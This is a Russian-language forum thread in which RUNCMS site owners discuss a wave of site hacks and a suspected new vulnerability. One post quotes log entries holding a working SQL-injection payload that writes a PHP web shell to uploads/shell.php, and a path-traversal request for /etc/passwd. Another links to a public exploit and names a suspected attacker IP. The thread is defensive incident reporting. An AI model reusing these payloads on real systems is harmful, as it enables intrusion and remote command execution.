|
Правила •
Регистрация •
Справка Сообщения за день • Поиск |
|
|
|
|
Опции темы | Опции просмотра |
[исход]
![]() |
Поступили сообщения о взломах нескольких сайтов. Возможно, появилась новая уязвимость в RUNCMS последней версии. В связи с этим, просьба внимательно следить за вашими сайтами, и по возможности сообщать обо всех подозрительных моментах. Это поможет локализовать и закрыть дырку.
Так же советаю заглядывать в этот и этот топики на .орге, там сообщения о двух взломах, возможно появится какая-нибудь дополнительная информация. Правила нашего Форума :: О клубе пользователей RUNCMS :: Рекомендации по публикации сообщений :: Прежде чем задать вопрос воспользуйтесь Поиском ------------------------------------------------------------------- Если что-то не работает, задавая вопрос, ! ОБЯЗАТЕЛЬНО ! пишите версию RUNCMS/модуля/PHP/MySQL и текст самой ошибки. |
||||
|
|
Старожил
![]() |
Цитата:
Совет, поставить модуль myerrors, он много ошибок невидимых отлавливает... Всё для Sony Ericsson |
||||
|
|
Нерешительный
|
У меня в логах следующее
GET /modules/wfdownloads/viewcat.php?list=-1%27or%27a%27%3D%27a%27+UNION+SELECT+0%2C0%2C0%2C% 27%3C%3F php+error_reporting%280%29%3Bini_set%28%22max_exec ution_time%22%2C0%29%3Becho+%22Hi+ Master+%22%3Bsystem%28%24_GET%5Bcmd%5D%29%3B%3F%3E %27%2C0%2C0%2C0%2C0%2C0%2C0 %2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2 C0%2C0%2C0%2C0%2C0%2C0%2 C0%2C0%2C0%2C0%2C0%2C0+INTOOUTFILE+%27..%2F..%2Fww w%2Fuploads%2Fshell.php%27+FROM+f pg_wfdownloads_downloads%2F%2A HTTP/1.1" 500 14321 и еще GET /class/xoopseditor/textarea/editor_registry.php?xoops_Config[language]=../../../../etc/passwd Последний раз редактировалось supaflyster, 11-30-2005 в 15:58 |
||||
|
|
Старожил
![]() |
У меня тоже прощупывали модули: wfdownloads и bamagalerie
Всё для Sony Ericsson |
||||
|
|
Старший участник
![]() |
советую прикрывать те ИП сразу
![]() Творческая работа - это прекрасный, необычайно тяжелый и изумительно радостный труд. Николай Островский |
||||
|
|
[исход]
![]() |
Цитата:
Цитата:
Цитата:
Правила нашего Форума :: О клубе пользователей RUNCMS :: Рекомендации по публикации сообщений :: Прежде чем задать вопрос воспользуйтесь Поиском ------------------------------------------------------------------- Если что-то не работает, задавая вопрос, ! ОБЯЗАТЕЛЬНО ! пишите версию RUNCMS/модуля/PHP/MySQL и текст самой ошибки. |
||||
|
|
Участник
|
Залили сегодня на 1.2 эксплоит вида htdocs/UserFiles/suntzuXXXX.php3 (XXXX - цифры)
Вычистил вручную, но что дальше делать? Сылка на текст эксплоита: http://www.milw0rm.com/id.php?id=1485 Поиск вредителей привел на 217.12.205.67, т.е. на http://www.itl.ua, где, видимо, они и находятся. Последний раз редактировалось Mimino, 02-10-2006 в 19:57 |
||||
|
|
[исход]
![]() |
Правила нашего Форума :: О клубе пользователей RUNCMS :: Рекомендации по публикации сообщений :: Прежде чем задать вопрос воспользуйтесь Поиском ------------------------------------------------------------------- Если что-то не работает, задавая вопрос, ! ОБЯЗАТЕЛЬНО ! пишите версию RUNCMS/модуля/PHP/MySQL и текст самой ошибки. |
||||
|
|
|
|
|
|
![]() |
Powered by: vBulletin Version 3.0 Copyright ©2000-2025, Jelsoft Enterprises Ltd. |
Все разделы прочитаны - Руководство форума - Архив - Вверх |